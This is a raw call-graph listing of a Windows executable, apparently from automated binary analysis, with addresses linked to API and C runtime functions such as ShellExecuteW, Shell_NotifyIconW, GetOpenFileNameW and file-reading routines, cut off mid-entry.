83471->83580 83474 431b28 83474->83471 83476 431b30 GetModuleFileNameW 83474->83476 83478 431ba4 GetForegroundWindow ShellExecuteW 83476->83478 83479 431b4c 83476->83479 83481 40d7c7 83478->83481 83602 401b70 83479->83602 83480 40d795 83487 40d7a8 83480->83487 83588 40e1e0 83480->83588 83485 40d7d1 SetCurrentDirectoryW 83481->83485 83485->83235 83487->83481 83599 401000 Shell_NotifyIconW _memset 83487->83599 83488 431b66 83609 40d3b0 75 API calls 2 library calls 83488->83609 83491 431b72 GetForegroundWindow ShellExecuteW 83492 431b9f 83491->83492 83492->83481 83493 40eba0 LoadLibraryA GetProcAddress 83493->83226 83495 40d86e 83494->83495 83496 40eb76 LoadLibraryA 83494->83496 83495->83226 83495->83493 83496->83495 83497 40eb87 GetProcAddress 83496->83497 83497->83495 83610 40e680 83498->83610 83502 401fa2 GetModuleFileNameW 83628 40ff90 83502->83628 83504 401fbd 83640 4107b0 83504->83640 83507 401b70 75 API calls 83508 401fe4 83507->83508 83643 4019e0 83508->83643 83510 401ff2 83511 4092c0 VariantClear 83510->83511 83512 402002 83511->83512 83513 401b70 75 API calls 83512->83513 83514 40201c 83513->83514 83515 4019e0 76 API calls 83514->83515 83516 40202c 83515->83516 83517 401b70 75 API calls 83516->83517 83518 40203c 83517->83518 83651 40c3e0 83518->83651 83520 40204d 83669 40c060 83520->83669 83524 40206e 83681 4115d0 83524->83681 83527 42c174 83529 401a70 75 API calls 83527->83529 83528 402088 83530 4115d0 __wcsicoll 79 API calls 83528->83530 83531 42c189 83529->83531 83532 402093 83530->83532 83534 401a70 75 API calls 83531->83534 83532->83531 83533 40209e 83532->83533 83535 4115d0 __wcsicoll 79 API calls 83533->83535 83536 42c1a7 83534->83536 83537 4020a9 83535->83537 83538 42c1b0 GetModuleFileNameW 83536->83538 83537->83538 83539 4020b4 83537->83539 83541 401a70 75 API calls 83538->83541 83540 4115d0 __wcsicoll 79 API calls 83539->83540 83542 4020bf 83540->83542 83543 42c1e2 83541->83543 83544 402107 83542->83544 83550 401a70 75 API calls 83542->83550 83553 42c20a _wcscpy 83542->83553 83706 40df50 75 API calls 83543->83706 83546 402119 83544->83546 83544->83553 83549 42c243 83546->83549 83689 40e7e0 83546->83689 83547 42c1f1 83548 401a70 75 API calls 83547->83548 83552 42c201 83548->83552 83551 4020e5 _wcscpy 83550->83551 83558 401a70 75 API calls 83551->83558 83552->83553 83555 401a70 75 API calls 83553->83555 83563 402148 83555->83563 83556 402132 83703 40d030 76 API calls 83556->83703 83558->83544 83559 40213e 83560 4092c0 VariantClear 83559->83560 83560->83563 83562 402184 83565 4092c0 VariantClear 83562->83565 83563->83562 83566 401a70 75 API calls 83563->83566 83704 40d030 76 API calls 83563->83704 83705 40e640 76 API calls 83563->83705 83567 402196 ctype 83565->83567 83566->83563 83567->83458 83569 40f3c9 83568->83569 83570 42ccf4 _memset 83568->83570 84437 40ffb0 76 API calls ctype 83569->84437 83572 42cd05 GetOpenFileNameW 83570->83572 83572->83569 83575 40d732 83572->83575 83573 40f3d2 84438 410130 SHGetMalloc 83573->84438 83575->83466 83575->83468 83576 40f3d9 84443 410020 88 API calls __wcsicoll 83576->84443 83578 40f3e7 84444 40f400 83578->84444 83581 42b9d3 83580->83581 83582 41025a LoadImageW RegisterClassExW 83580->83582 84489 443e8f EnumResourceNamesW LoadImageW 83581->84489 84488 4102f0 7 API calls 83582->84488 83585 40d790 83587 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 83585->83587 83586 42b9da 83587->83480 83590 40e207 _memset 83588->83590 83589 40e262 83591 40e2a4 83589->83591 84512 43737d 84 API calls __wcsicoll 83589->84512 83590->83589 83592 42aa14 DestroyIcon 83590->83592 83594 40e2c0 Shell_NotifyIconW 83591->83594 83595 42aa50 Shell_NotifyIconW 83591->83595 83592->83589 84490 401be0 83594->84490 83597 40e2da 83597->83487 83598->83468 83599->83481 83600->83468 83601->83474 83603 401b76 _wcslen 83602->83603 83604 41171a 75 API calls 83603->83604 83607 401bc5 83603->83607 83605 401bad _memcpy_s 83604->83605 83606 41171a 75 API calls 83605->83606 83606->83607 83608 40d3b0 75 API calls 2 library calls 83607->83608 83608->83488 83609->83491 83611 40c060 75 API calls 83610->83611 83612 401f90 83611->83612 83613 402940 83612->83613 83614 40294a __write_nolock 83613->83614 83707 4021e0 83614->83707 83617 402972 83627 4029a4 83617->83627 83719 401cf0 83617->83719 83619 402a8c 83620 401b70 75 API calls 83619->83620 83626 402abe 83619->83626 83622 402ab3 83620->83622 83621 401b70 75 API calls 83621->83627 83730 40d970 75 API calls 2 library calls 83622->83730 83624 401cf0 75 API calls 83624->83627 83626->83502 83627->83619 83627->83621 83627->83624 83722 402ae0 83627->83722 83729 40d970 75 API calls 2 library calls 83627->83729 83755 40f5e0 83628->83755 83631 40ffa6 83631->83504 83633 42b6d8 83637 42b6e6 83633->83637 83811 434fe1 83633->83811 83634 413a88 ___convertcp 67 API calls 83636 42b6f5 83634->83636 83638 434fe1 106 API calls 83636->83638 83637->83634 83639 42b702 83638->83639 83639->83504 83641 41171a 75 API calls 83640->83641 83642 401fd6 83641->83642 83642->83507 83644 401a03 83643->83644 83645 4019e5 83643->83645 83644->83645 83646 401a1a 83644->83646 83648 4019ff 83645->83648 84414 404260 76 API calls 83645->84414 84415 404260 76 API calls 83646->84415 83648->83510 83650 401a26 83650->83510 83652 40c3e4 83651->83652 83653 40c42c 83651->83653 83656 40c3f0 83652->83656 83657 42a475 83652->83657 83654 42a422 83653->83654 83655 40c435 83653->83655 83661 42a427 83654->83661 83662 42a445 83654->83662 83658 40c441 83655->83658 83659 42a455 83655->83659 84416 4042f0 75 API calls __cinit 83656->84416 84421 453155 75 API calls 83657->84421 84417 4042f0 75 API calls __cinit 83658->84417 84420 453155 75 API calls 83659->84420 83668 40c3fb 83661->83668 84418 453155 75 API calls 83661->84418 84419 453155 75 API calls 83662->84419 83668->83520 83668->83668 83670 41171a 75 API calls 83669->83670 83671 40c088 83670->83671 83672 41171a 75 API calls 83671->83672 83673 402061 83672->83673 83674 401a70 83673->83674 83675 401a90 83674->83675 83676 401a77 83674->83676 83677 4021e0 75 API calls 83675->83677 83678 401a8d 83676->83678 84422 404080 75 API calls _memcpy_s 83676->84422 83680 401a9c 83677->83680 83678->83524 83680->83524 83682 4115e1 83681->83682 83683 411650 83681->83683 83688 40207d 83682->83688 84423 417f23 67 API calls __getptd_noexit 83682->84423 84425 4114bf 79 API calls 3 library calls 83683->84425 83686 4115ed 84424 417ebb 6 API calls 2 library calls 83686->84424 83688->83527 83688->83528 83690 40e7f7 83689->83690 83691 42b34a 83689->83691 84426 40e8f0 83690->84426 84432 40e300 83691->84432 83695 42b34f 83697 40e8f0 76 API calls 83695->83697 83696 40e809 83698 41171a 75 API calls 83696->83698 83699 42b35b 83696->83699 83697->83699 83700 40e8ac 83698->83700 83699->83556 83701 41171a 75 API calls 83700->83701 83702 40e8b7 83701->83702 83702->83556 83703->83559 83704->83563 83705->83563 83706->83547 83708 4021f1 _wcslen 83707->83708 83709 42a598 83707->83709 83711 402205 83708->83711 83712 402226 83708->83712 83747 40c740 83709->83747 83731 404020 75 API calls ctype 83711->83731 83732 401380 83712->83732 83714 42a5a2 83717 40220c _memcpy_s 83717->83617 83720 402ae0 75 API calls 83719->83720 83721 401cf7 83720->83721 83721->83617 83723 42a06a 83722->83723 83724 402aef 83722->83724 83725 401380 75 API calls 83723->83725 83724->83627 83726 42a072 83725->83726 83727 41171a 75 API calls 83726->83727 83728 42a095 _memcpy_s 83727->83728 83728->83627 83729->83627 83730->83626 83731->83717 83733 41171a 75 API calls 83732->83733 83734 401387 83733->83734 83734->83714 83735 41171a 83734->83735 83739 411724 83735->83739 83736 4138ba _malloc 67 API calls 83736->83739 83737 41173e 83737->83717 83739->83736 83739->83737 83743 411740 std::bad_alloc::bad_alloc 83739->83743 83752 411afc 6 API calls __decode_pointer 83739->83752 83740 411766 83753 4116fd 67 API calls std::exception::exception 83740->83753 83742 411770 83754 41805b RaiseException 83742->83754 83743->83740 83745 411421 __cinit 74 API calls 83743->83745 83745->83740 83746 41177e 83748 40c752 83747->83748 83749 40c747 83747->83749 83748->83714 83749->83748 83750 402ae0 75 API calls 83749->83750 83751 42a572 _memcpy_s 83750->83751 83751->83714 83752->83739 83753->83742 83754->83746 83815 40f580 83755->83815 83757 40f5f8 _strcat ctype 83823 40f6d0 83757->83823 83762 42b2ee 83852 4151b0 83762->83852 83764 40f679 83764->83762 83765 40f681 83764->83765 83839 414e94 83765->83839 83769 40f68b 83769->83631 83774 452574 83769->83774 83771 42b31d 83858 415484 83771->83858 83773 42b33d 83775 41557c _fseek 105 API calls 83774->83775 83776 4525df 83775->83776 84359 4523ce 83776->84359 83779 4525fc 83779->83633 83780 4151b0 __fread_nolock 81 API calls 83781 45261d 83780->83781 83782 4151b0 __fread_nolock 81 API calls 83781->83782 83783 45262e 83782->83783 83784 4151b0 __fread_nolock 81 API calls 83783->83784 83785 452649 83784->83785 83786 4151b0 __fread_nolock 81 API calls 83785->83786 83787 452666 83786->83787 83788 41557c _fseek 105 API calls 83787->83788 83789 452682 83788->83789 83790 4138ba _malloc 67 API calls 83789->83790 83791 45268e 83790->83791 83792 4138ba _malloc 67 API calls 83791->83792 83793 45269b 83792->83793 83794 4151b0 __fread_nolock 81 API calls 83793->83794 83795 4526ac 83794->83795 83796 44afdc GetSystemTimeAsFileTime 83795->83796 83797 4526bf 83796->83797 83798 4526d5 83797->83798 83799 4526fd 83797->83799 83802 413a88 ___convertcp 67 API calls 83798->83802 83800 452704 83799->83800 83801 45275b 83799->83801 84365 44b195 83800->84365 83804 413a88 ___convertcp 67 API calls 83801->83804 83805 4526df 83802->83805 83807 452759 83804->83807 83808 413a88 ___convertcp 67 API calls 83805->83808 83806 452753 83809 413a88 ___convertcp 67 API calls 83806->83809 83807->83633 83810 4526e8 83808->83810 83809->83807 83810->83633 83812 434ff1 83811->83812 83813 434feb 83811->83813 83812->83637 83814 414e94 __fcloseall 106 API calls 83813->83814 83814->83812 83816 429440 83815->83816 83817 40f589 _wcslen 83815->83817 83818 40f58f WideCharToMultiByte 83817->83818 83819 40f5d8 83818->83819 83820 40f5ad 83818->83820 83819->83757 83821 41171a 75 API calls 83820->83821 83822 40f5bb WideCharToMultiByte 83821->83822 83822->83757 83824 40f6dd _strlen 83823->83824 83871 40f790 83824->83871 83827 414e06 83890 414d40 83827->83890 83829 40f666 83829->83762 83830 40f450 83829->83830 83833 40f45a _strcat _memcpy_s __write_nolock 83830->83833 83831 4151b0 __fread_nolock 81 API calls 83831->83833 83833->83831 83834 42936d 83833->83834 83838 40f531 83833->83838 83973 41557c 83833->83973 83835 41557c _fseek 105 API calls 83834->83835 83836 429394 83835->83836 83837 4151b0 __fread_nolock 81 API calls 83836->83837 83837->83838 83838->83764 83840 414ea0 __locking 83839->83840 83841 414ed1 83840->83841 83842 414eb4 83840->83842 83844 415965 __lock_file 68 API calls 83841->83844 83849 414ec9 __locking 83841->83849 84112 417f23 67 API calls __getptd_noexit 83842->84112 83846 414ee9 83844->83846 83845 414eb9 84113 417ebb 6 API calls 2 library calls 83845->84113 84096 414e1d 83846->84096 83849->83769 84181 41511a 83852->84181 83854 4151c8 83855 44afdc 83854->83855 84352 4431e0 83855->84352 83857 44affd 83857->83771 83859 415490 __locking 83858->83859 83860 4154bb 83859->83860 83861 41549e 83859->83861 83863 415965 __lock_file 68 API calls 83860->83863 84356 417f23 67 API calls __getptd_noexit 83861->84356 83865 4154c3 83863->83865 83864 4154a3 84357 417ebb 6 API calls 2 library calls 83864->84357 83866 4152e7 __ftell_nolock 71 API calls 83865->83866 83868 4154cf 83866->83868 84358 4154e8 LeaveCriticalSection LeaveCriticalSection _fprintf 83868->84358 83870 4154b3 __locking 83870->83773 83873 40f7ae _memset 83871->83873 83874 40f628 83873->83874 83875 415258 83873->83875 83874->83827 83876 415285 83875->83876 83877 415268 83875->83877 83876->83877 83879 41528c 83876->83879 83886 417f23 67 API calls __getptd_noexit 83877->83886 83888 41c551 103 API calls 14 library calls 83879->83888 83880 41526d 83887 417ebb 6 API calls 2 library calls 83880->83887 83883 41527d 83883->83873 83884 4152b2 83884->83883 83889 4191c9 101 API calls 6 library calls 83884->83889 83886->83880 83888->83884 83889->83883 83891 414d4c __locking 83890->83891 83892 414d5f 83891->83892 83895 414d95 83891->83895 83942 417f23 67 API calls __getptd_noexit 83892->83942 83894 414d64 83943 417ebb 6 API calls 2 library calls 83894->83943 83909 41e28c 83895->83909 83898 414d74 __locking @_EH4_CallFilterFunc@8 83898->83829 83899 414d9a 83900 414da1 83899->83900 83901 414dae 83899->83901 83944 417f23 67 API calls __getptd_noexit 83900->83944 83903 414dd6 83901->83903 83904 414db6 83901->83904 83927 41dfd8 83903->83927 83945 417f23 67 API calls __getptd_noexit 83904->83945 83910 41e298 __locking 83909->83910 83911 418407 __lock 67 API calls 83910->83911 83924 41e2a6 83911->83924 83912 41e31b 83947 41e3bb 83912->83947 83913 41e322 83915 416fb6 __malloc_crt 67 API calls 83913->83915 83917 41e32c 83915->83917 83916 41e3b0 __locking 83916->83899 83917->83912 83952 4189e6 InitializeCriticalSectionAndSpinCount __locking 83917->83952 83919 418344 __mtinitlocknum 67 API calls 83919->83924 83921 41e351 83922 41e35c 83921->83922 83923 41e36f EnterCriticalSection 83921->83923 83926 413a88 ___convertcp 67 API calls 83922->83926 83923->83912 83924->83912 83924->83913 83924->83919 83950 4159a6 68 API calls __lock 83924->83950 83951 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 83924->83951 83926->83912 83928 41dffb __wopenfile 83927->83928 83929 41e015 83928->83929 83941 41e1e9 83928->83941 83959 4136bc 79 API calls 2 library calls 83928->83959 83957 417f23 67 API calls __getptd_noexit 83929->83957 83931 41e01a 83958 417ebb 6 API calls 2 library calls 83931->83958 83933 41e247 83954 425db0 83933->83954 83937 41e1e2 83937->83941 83960 4136bc 79 API calls 2 library calls 83937->83960 83939 41e201 83939->83941 83961 4136bc 79 API calls 2 library calls 83939->83961 83941->83929 83941->83933 83942->83894 83944->83898 83945->83898 83946 414dfc LeaveCriticalSection LeaveCriticalSection _fprintf 83946->83898 83953 41832d LeaveCriticalSection 83947->83953 83949 41e3c2 83949->83916 83950->83924 83951->83924 83952->83921 83953->83949 83962 425ce4 83954->83962 83956 414de1 83956->83946 83957->83931 83959->83937 83960->83939 83961->83941 83965 425cf0 __locking 83962->83965 83963 425d03 83964 417f23 __gmtime64_s 67 API calls 83963->83964 83966 425d08 83964->83966 83965->83963 83967 425d41 83965->83967 83968 417ebb __gmtime64_s 6 API calls 83966->83968 83969 4255c4 __tsopen_nolock 132 API calls 83967->83969 83972 425d17 __locking 83968->83972 83970 425d5b 83969->83970 83971 425d82 __sopen_helper LeaveCriticalSection 83970->83971 83971->83972 83972->83956 83977 415588 __locking 83973->83977 83974 415596 84004 417f23 67 API calls __getptd_noexit 83974->84004 83976 4155c4 83986 415965 83976->83986 83977->83974 83977->83976 83979 41559b 84005 417ebb 6 API calls 2 library calls 83979->84005 83985 4155ab __locking 83985->83833 83987 415977 83986->83987 83988 415999 EnterCriticalSection 83986->83988 83987->83988 83989 41597f 83987->83989 83990 4155cc 83988->83990 83991 418407 __lock 67 API calls 83989->83991 83992 4154f2 83990->83992 83991->83990 83993 415512 83992->83993 83994 415502 83992->83994 83999 415524 83993->83999 84007 4152e7 83993->84007 84061 417f23 67 API calls __getptd_noexit 83994->84061 83998 415507 84006 4155f7 LeaveCriticalSection LeaveCriticalSection _fprintf 83998->84006 84024 41486c 83999->84024 84004->83979 84006->83985 84008 41531a 84007->84008 84009 4152fa 84007->84009 84011 41453a __fileno 67 API calls 84008->84011 84062 417f23 67 API calls __getptd_noexit 84009->84062 84013 415320 84011->84013 84012 4152ff 84063 417ebb 6 API calls 2 library calls 84012->84063 84015 41efd4 __locking 71 API calls 84013->84015 84016 415335 84015->84016 84017 4153a9 84016->84017 84019 415364 84016->84019 84023 41530f 84016->84023 84064 417f23 67 API calls __getptd_noexit 84017->84064 84020 41efd4 __locking 71 API calls 84019->84020 84019->84023 84021 415404 84020->84021 84022 41efd4 __locking 71 API calls 84021->84022 84021->84023 84022->84023 84023->83999 84025 414885 84024->84025 84029 4148a7 84024->84029 84026 41453a __fileno 67 API calls 84025->84026 84025->84029 84027 4148a0 84026->84027 84065 41c3cf 101 API calls 5 library calls 84027->84065 84030 41453a 84029->84030 84031 414549 84030->84031 84035 41455e 84030->84035 84066 417f23 67 API calls __getptd_noexit 84031->84066 84033 41454e 84067 417ebb 6 API calls 2 library calls 84033->84067 84036 41efd4 84035->84036 84037 41efe0 __locking 84036->84037 84038 41f003 84037->84038 84039 41efe8 84037->84039 84040 41f011 84038->84040 84045 41f052 84038->84045 84088 417f36 67 API calls __getptd_noexit 84039->84088 84090 417f36 67 API calls __getptd_noexit 84040->84090 84043 41efed 84089 417f23 67 API calls __getptd_noexit 84043->84089 84044 41f016 84091 417f23 67 API calls __getptd_noexit 84044->84091 84068 41ba3b 84045->84068 84049 41f01d 84092 417ebb 6 API calls 2 library calls 84049->84092 84050 41f058 84052 41f065 84050->84052 84053 41f07b 84050->84053 84078 41ef5f 84052->84078 84093 417f23 67 API calls __getptd_noexit 84053->84093 84055 41eff5 __locking 84055->83998 84057 41f080 84094 417f36 67 API calls __getptd_noexit 84057->84094 84058 41f073 84095 41f0a6 LeaveCriticalSection __unlock_fhandle 84058->84095 84061->83998 84062->84012 84064->84023 84065->84029 84066->84033 84069 41ba47 __locking 84068->84069 84070 41baa2 84069->84070 84071 418407 __lock 67 API calls 84069->84071 84072 41bac4 __locking 84070->84072 84073 41baa7 EnterCriticalSection 84070->84073 84074 41ba73 84071->84074 84072->84050 84073->84072 84075 41ba8a 84074->84075 84076 4189e6 ___lock_fhandle InitializeCriticalSectionAndSpinCount 84074->84076 84077 41bad2 ___lock_fhandle LeaveCriticalSection 84075->84077 84076->84075 84077->84070 84079 41b9c4 __chsize_nolock 67 API calls 84078->84079 84080 41ef6e 84079->84080 84081 41ef84 SetFilePointer 84080->84081 84082 41ef74 84080->84082 84084 41efa3 84081->84084 84085 41ef9b GetLastError 84081->84085 84083 417f23 __gmtime64_s 67 API calls 84082->84083 84086 41ef79 84083->84086 84084->84086 84087 417f49 __dosmaperr 67 API calls 84084->84087 84085->84084 84086->84058 84087->84086 84088->84043 84089->84055 84090->84044 84091->84049 84093->84057 84094->84058 84095->84055 84097 414e31 84096->84097 84098 414e4d 84096->84098 84142 417f23 67 API calls __getptd_noexit 84097->84142 84101 41486c __flush 101 API calls 84098->84101 84104 414e46 84098->84104 84100 414e36 84143 417ebb 6 API calls 2 library calls 84100->84143 84103 414e59 84101->84103 84115 41e680 84103->84115 84114 414f08 LeaveCriticalSection LeaveCriticalSection _fprintf 84104->84114 84107 41453a __fileno 67 API calls 84108 414e67 84107->84108 84119 41e5b3 84108->84119 84110 414e6d 84110->84104 84111 413a88 ___convertcp 67 API calls 84110->84111 84111->84104 84112->83845 84114->83849 84116 41e690 84115->84116 84118 414e61 84115->84118 84117 413a88 ___convertcp 67 API calls 84116->84117 84116->84118 84117->84118 84118->84107 84120 41e5bf __locking 84119->84120 84121 41e5e2 84120->84121 84122 41e5c7 84120->84122 84124 41e5f0 84121->84124 84127 41e631 84121->84127 84159 417f36 67 API calls __getptd_noexit 84122->84159 84161 417f36 67 API calls __getptd_noexit 84124->84161 84125 41e5cc 84160 417f23 67 API calls __getptd_noexit 84125->84160 84130 41ba3b ___lock_fhandle 68 API calls 84127->84130 84129 41e5f5 84162 417f23 67 API calls __getptd_noexit 84129->84162 84132 41e637 84130->84132 84134 41e652 84132->84134 84135 41e644 84132->84135 84133 41e5fc 84163 417ebb 6 API calls 2 library calls 84133->84163 84164 417f23 67 API calls __getptd_noexit 84134->84164 84144 41e517 84135->84144 84139 41e5d4 __locking 84139->84110 84140 41e64c 84165 41e676 LeaveCriticalSection __unlock_fhandle 84140->84165 84142->84100 84166 41b9c4 84144->84166 84146 41e57d 84179 41b93e 68 API calls 2 library calls 84146->84179 84148 41e527 84148->84146 84149 41b9c4 __chsize_nolock 67 API calls 84148->84149 84158 41e55b 84148->84158 84153 41e552 84149->84153 84150 41b9c4 __chsize_nolock 67 API calls 84154 41e567 CloseHandle 84150->84154 84151 41e585 84152 41e5a7 84151->84152 84180 417f49 67 API calls 3 library calls 84151->84180 84152->84140 84156 41b9c4 __chsize_nolock 67 API calls 84153->84156 84154->84146 84157 41e573 GetLastError 84154->84157 84156->84158 84157->84146 84158->84146 84158->84150 84159->84125 84160->84139 84161->84129 84162->84133 84164->84140 84165->84139 84167 41b9d1 84166->84167 84168 41b9e9 84166->84168 84169 417f36 __chsize_nolock 67 API calls 84167->84169 84171 417f36 __chsize_nolock 67 API calls 84168->84171 84178 41ba2e 84168->84178 84170 41b9d6 84169->84170 84172 417f23 __gmtime64_s 67 API calls 84170->84172 84173 41ba17 84171->84173 84175 41b9de 84172->84175 84174 417f23 __gmtime64_s 67 API calls 84173->84174 84176 41ba1e 84174->84176 84175->84148 84177 417ebb __gmtime64_s 6 API calls 84176->84177 84177->84178 84178->84148 84179->84151 84180->84152 84182 415126 __locking 84181->84182 84183 41516f 84182->84183 84184 415164 __locking 84182->84184 84189 41513a _memset 84182->84189 84185 415965 __lock_file 68 API calls 84183->84185 84184->83854 84187 415177 84185->84187 84194 414f10 84187->84194 84210 417f23 67 API calls __getptd_noexit 84189->84210 84190 415154 84211 417ebb 6 API calls 2 library calls 84190->84211 84195 414f4c 84194->84195 84198 414f2e _memset 84194->84198 84212 4151a6 LeaveCriticalSection LeaveCriticalSection _fprintf 84195->84212 84196 414f37 84263 417f23 67 API calls __getptd_noexit 84196->84263 84198->84195 84198->84196 84202 414f8b 84198->84202 84201 4150d5 _memset 84267 417f23 67 API calls __getptd_noexit 84201->84267 84202->84195 84202->84201 84203 41453a __fileno 67 API calls 84202->84203 84208 4150a9 _memset 84202->84208 84213 41ed9e 84202->84213 84243 41e6b1 84202->84243 84265 41ee9b 67 API calls 3 library calls 84202->84265 84203->84202 84207 414f3c 84264 417ebb 6 API calls 2 library calls 84207->84264 84266 417f23 67 API calls __getptd_noexit 84208->84266 84210->84190 84212->84184 84214 41edaa __locking 84213->84214 84215 41edb2 84214->84215 84216 41edcd 84214->84216 84337 417f36 67 API calls __getptd_noexit 84215->84337 84217 41eddb 84216->84217 84222 41ee1c 84216->84222 84339 417f36 67 API calls __getptd_noexit 84217->84339 84220 41edb7 84338 417f23 67 API calls __getptd_noexit 84220->84338 84221 41ede0 84340 417f23 67 API calls __getptd_noexit 84221->84340 84225 41ee29 84222->84225 84226 41ee3d 84222->84226 84342 417f36 67 API calls __getptd_noexit 84225->84342 84227 41ba3b ___lock_fhandle 68 API calls 84226->84227 84232 41ee43 84227->84232 84228 41ede7 84341 417ebb 6 API calls 2 library calls 84228->84341 84230 41ee2e 84343 417f23 67 API calls __getptd_noexit 84230->84343 84231 41edbf __locking 84231->84202 84234 41ee50 84232->84234 84235 41ee66 84232->84235 84268 41e7dc 84234->84268 84344 417f23 67 API calls __getptd_noexit 84235->84344 84239 41ee5e 84346 41ee91 LeaveCriticalSection __unlock_fhandle 84239->84346 84240 41ee6b 84345 417f36 67 API calls __getptd_noexit 84240->84345 84244 41e6c1 84243->84244 84247 41e6de 84243->84247 84350 417f23 67 API calls __getptd_noexit 84244->84350 84246 41e6c6 84351 417ebb 6 API calls 2 library calls 84246->84351 84249 41e713 84247->84249 84255 41e6d6 84247->84255 84347 423600 84247->84347 84251 41453a __fileno 67 API calls 84249->84251 84252 41e727 84251->84252 84253 41ed9e __read 79 API calls 84252->84253 84254 41e72e 84253->84254 84254->84255 84256 41453a __fileno 67 API calls 84254->84256 84255->84202 84257 41e751 84256->84257 84257->84255 84258 41453a __fileno 67 API calls 84257->84258 84259 41e75d 84258->84259 84259->84255 84260 41453a __fileno 67 API calls 84259->84260 84261 41e769 84260->84261 84262 41453a __fileno 67 API calls 84261->84262 84262->84255 84263->84207 84265->84202 84266->84207 84267->84207 84269 41e813 84268->84269 84270 41e7f8 84268->84270 84271 41e822 84269->84271 84273 41e849 84269->84273 84272 417f36 __chsize_nolock 67 API calls 84270->84272 84274 417f36 __chsize_nolock 67 API calls 84271->84274 84275 41e7fd 84272->84275 84278 41e868 84273->84278 84289 41e87c 84273->84289 84277 41e827 84274->84277 84276 417f23 __gmtime64_s 67 API calls 84275->84276 84290 41e805 84276->84290 84280 417f23 __gmtime64_s 67 API calls 84277->84280 84281 417f36 __chsize_nolock 67 API calls 84278->84281 84279 41e8d4 84283 417f36 __chsize_nolock 67 API calls 84279->84283 84282 41e82e 84280->84282 84284 41e86d 84281->84284 84285 417ebb __gmtime64_s 6 API calls 84282->84285 84286 41e8d9 84283->84286 84287 417f23 __gmtime64_s 67 API calls 84284->84287 84285->84290 84291 417f23 __gmtime64_s 67 API calls 84286->84291 84288 41e874 84287->84288 84293 417ebb __gmtime64_s 6 API calls 84288->84293 84289->84279 84289->84290 84292 41e8b0 84289->84292 84294 41e8f5 84289->84294 84290->84239 84291->84288 84292->84279 84297 41e8bb ReadFile 84292->84297 84293->84290 84296 416fb6 __malloc_crt 67 API calls 84294->84296 84298 41e90b 84296->84298 84299 41ed62 GetLastError 84297->84299 84300 41e9e7 84297->84300 84303 41e931 84298->84303 84304 41e913 84298->84304 84301 41ebe8 84299->84301 84302 41ed6f 84299->84302 84300->84299 84307 41e9fb 84300->84307 84312 417f49 __dosmaperr 67 API calls 84301->84312 84316 41eb6d 84301->84316 84305 417f23 __gmtime64_s 67 API calls 84302->84305 84308 423462 __lseeki64_nolock 69 API calls 84303->84308 84306 417f23 __gmtime64_s 67 API calls 84304->84306 84310 41ed74 84305->84310 84311 41e918 84306->84311 84307->84316 84317 41ea17 84307->84317 84320 41ec2d 84307->84320 84309 41e93d 84308->84309 84309->84297 84313 417f36 __chsize_nolock 67 API calls 84310->84313 84314 417f36 __chsize_nolock 67 API calls 84311->84314 84312->84316 84313->84316 84314->84290 84315 413a88 ___convertcp 67 API calls 84315->84290 84316->84290 84316->84315 84318 41ea7d ReadFile 84317->84318 84325 41eafa 84317->84325 84323 41ea9b GetLastError 84318->84323 84328 41eaa5 84318->84328 84319 41eca5 ReadFile 84321 41ecc4 GetLastError 84319->84321 84329 41ecce 84319->84329 84320->84316 84320->84319 84321->84320 84321->84329 84322 41ebbe MultiByteToWideChar 84322->84316 84324 41ebe2 GetLastError 84322->84324 84323->84317 84323->84328 84324->84301 84325->84316 84326 41eb75 84325->84326 84327 41eb68 84325->84327 84333 41eb32 84325->84333 84326->84333 84334 41ebac 84326->84334 84330 417f23 __gmtime64_s 67 API calls 84327->84330 84328->84317 84331 423462 __lseeki64_nolock 69 API calls 84328->84331 84329->84320 84332 423462 __lseeki64_nolock 69 API calls 84329->84332 84330->84316 84331->84328 84332->84329 84333->84322 84335 423462 __lseeki64_nolock 69 API calls 84334->84335 84336 41ebbb 84335->84336 84336->84322 84337->84220 84338->84231 84339->84221 84340->84228 84342->84230 84343->84228 84344->84240 84345->84239 84346->84231 84348 416fb6 __malloc_crt 67 API calls 84347->84348 84349 423615 84348->84349 84349->84249 84350->84246 84355 414cef GetSystemTimeAsFileTime __aulldiv 84352->84355 84354 4431ef 84354->83857 84355->84354 84356->83864 84358->83870 84361 4523e1 _wcscpy 84359->84361 84360 452553 84360->83779 84360->83780 84361->84360 84362 44afdc GetSystemTimeAsFileTime 84361->84362 84363 4151b0 81 API calls __fread_nolock 84361->84363 84364 41557c 105 API calls _fseek 84361->84364 84362->84361 84363->84361 84364->84361 84366 44b1b4 84365->84366 84367 44b1a6 84365->84367 84369 44b1ca 84366->84369 84370 414e06 138 API calls 84366->84370 84371 44b1c2 84366->84371 84368 414e06 138 API calls 84367->84368 84368->84366 84400 4352d1 81 API calls 2 library calls 84369->84400 84372 44b2c1 84370->84372 84371->83806 84372->84369 84374 44b2cf 84372->84374 84376 44b2dc 84374->84376 84379 414e94 __fcloseall 106 API calls 84374->84379 84375 44b20d 84377 44b211 84375->84377 84378 44b23b 84375->84378 84376->83806 84381 44b21e 84377->84381 84382 414e94 __fcloseall 106 API calls 84377->84382 84401 43526e 84378->84401 84379->84376 84383 44b22e 84381->84383 84385 414e94 __fcloseall 106 API calls 84381->84385 84382->84381 84383->83806 84384 44b242 84386 44b270 84384->84386 84388 44b248 84384->84388 84385->84383 84411 44b0af 111 API calls 84386->84411 84389 44b255 84388->84389 84391 414e94 __fcloseall 106 API calls 84388->84391 84392 44b265 84389->84392 84393 414e94 __fcloseall 106 API calls 84389->84393 84390 44b276 84412 43522c 67 API calls ___convertcp 84390->84412 84391->84389 84392->83806 84393->84392 84395 44b27c 84396 44b289 84395->84396 84397 414e94 __fcloseall 106 API calls 84395->84397 84398 44b299 84396->84398 84399 414e94 __fcloseall 106 API calls 84396->84399 84397->84396 84398->83806 84399->84398 84400->84375 84402 4138ba _malloc 67 API calls 84401->84402 84403 43527d 84402->84403 84404 4138ba _malloc 67 API calls 84403->84404 84405 43528d 84404->84405 84406 4138ba _malloc 67 API calls 84405->84406 84407 43529d 84406->84407 84409 4352bc 84407->84409 84413 43522c 67 API calls ___convertcp 84407->84413 84409->84384 84410 4352c8 84410->84384 84411->84390 84412->84395 84413->84410 84414->83648 84415->83650 84416->83668 84417->83668 84418->83668 84419->83659 84420->83668 84421->83668 84422->83678 84423->83686 84425->83688 84427 40e8f9 84426->84427 84431 40e7fc 84426->84431 84428 4092c0 VariantClear 84427->84428 84429 40e8fe 84428->84429 84430 41171a 75 API calls 84429->84430 84430->84431 84431->83695 84431->83696 84433 40e306 84432->84433 84434 40e33e ctype 